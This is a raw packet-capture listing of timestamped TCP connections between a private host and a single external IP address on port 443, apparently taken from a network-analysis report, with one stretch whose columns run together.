Dec 4, 2024 17:05:08.076164007 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.076170921 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.076225996 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.076261997 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.076272011 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.076289892 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.076308966 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.076328993 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.123334885 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.166178942 CET   443        49804      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.166268110 CET   443        49804      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.166268110 CET   49804      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.166356087 CET   49804      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.167422056 CET   49804      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.167440891 CET   443        49804      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.168082952 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.168123007 CET   443        49811      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.168220043 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.168473959 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.168487072 CET   443        49811      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.196860075 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.197014093 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.197026968 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.197046995 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.197118044 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.197148085 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.197170019 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.197252035 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.197318077 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.239337921 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.239479065 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.283339977 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.306499004 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.306606054 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.306713104 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.306740046 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.306777954 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.306834936 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.351340055 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.351494074 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.395334959 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.557146072 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.557265043 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.557288885 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.557404041 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.557419062 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.557523012 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.557545900 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.557624102 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.557636023 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.603338957 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.802685022 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.802865028 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.803174019 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.803221941 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.843344927 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.844305038 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.844403982 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.887336969 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.303879976 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.304097891 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.304450989 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.304516077 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.304547071 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.351332903 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.356965065 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.357032061 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.403331041 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.420545101 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.420736074 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.420820951 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.420877934 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.467341900 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.468867064 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.469058037 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.511343002 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.663685083 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.663794041 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.663815022 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.663846970 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.663882971 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.663945913 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.663963079 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.663974047 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.664082050 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:09.711329937 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.963884115 CET   443        49811      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:09.963995934 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.002232075 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.002255917 CET   443        49811      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.004693985 CET   49811      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.004703045 CET   443        49811      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.019716024 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.019826889 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.019828081 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.019860983 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.019937038 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.019962072 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.019975901 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.020025015 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.020128965 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.020159960 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.020184040 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.063333988 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.265659094 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.265789032 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.265836000 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.265858889 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.265891075 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.265907049 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.265935898 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.265974045 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.265983105 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.266043901 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.266176939 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.266200066 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.307332039 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.615178108 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.615343094 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.615381956 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.615499020 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.659327984 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.659466028 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.703332901 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.865499973 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.865659952 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.865752935 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.865798950 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.865822077 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.911336899 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:10.911483049 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.911636114 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:10.959328890 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.112164974 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.112337112 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.112359047 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.112400055 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.112484932 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.112520933 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.159348011 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.159487009 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.203349113 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.459047079 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.459224939 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.459261894 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:11.459393024 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:11.507333040 CET   443        49805      159.69.102.165   192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.507486105 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.507616997 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.527457952 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527481079 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527551889 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527700901 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.528264046 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.528284073 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.531435966 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531481981 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.531570911 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531806946 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531826019 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.555332899 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706312895 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706495047 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.706562996 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706700087 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.751327991 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.955662012 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.955869913 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.955899000 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.956013918 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.956044912 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.956161022 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.003329992 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.200967073 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.201211929 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.201303959 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.201355934 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.201385021 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.247333050 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.247525930 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.247595072 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.291338921 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444402933 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444601059 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.444628954 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444763899 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.491338968 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.491545916 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.535341024 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.683782101 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684029102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684130907 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684257984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684283972 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684360027 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684433937 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684489965 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.731338024 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.015708923 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.015888929 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.059335947 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.059552908 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.059587002 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.107331991 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.154871941 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155107021 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155150890 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155251980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155272007 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155318975 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155344963 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155457973 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.203330040 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.386854887 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387001038 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.387078047 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387183905 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.387212992 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387326956 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.435329914 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541063070 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541224957 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541266918 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541415930 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541439056 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541594982 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541618109 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541639090 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541714907 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.587341070 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.701913118 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.701982021 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.702600956 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.702615023 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.704931021 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.704936981 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757184982 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757330894 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.757361889 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757482052 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.803332090 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.803572893 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.851327896 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893309116 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893460989 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893501043 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893584967 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893594980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893630981 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893685102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893718958 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893779039 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.939332008 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111273050 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111438990 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.111465931 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111623049 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.159342051 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.159502029 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.207334995 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247092962 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247271061 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.247303009 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247421980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.247447014 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247553110 CET49805443192.168.2.4159.69.102.165
Timestamp                          Source Port  Dest Port  Source IP        Dest IP
Dec 4, 2024 17:05:14.247582912 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.291337967 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.388410091 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.388609886 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.388628006 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.388739109 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.388751030 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.388793945 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.388853073 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.431328058 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.575397015 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.575587988 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.575647116 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.575778008 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.575809956 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.575902939 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.575931072 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.575937986 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.575953007 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.619332075 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.727483988 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.727615118 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.727633953 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.727761984 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.727835894 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.727863073 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.727987051 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.771342039 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.856843948 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.859175920 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.859216928 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.862946033 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.862982988 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.862997055 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.907341003 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.981745958 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.982146025 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:14.982436895 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.982501984 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.982544899 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:14.982583046 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.023329973 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.026983976 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.027054071 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.027108908 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.027139902 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.067327976 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.105770111 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.106012106 CET  443          49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.106276989 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.106340885 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.106374025 CET  49805        443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:15.125835896 CET  443          49816      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.125853062 CET  443          49816      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:15.125922918 CET  443          49816      159.69.102.165   192.168.2.4
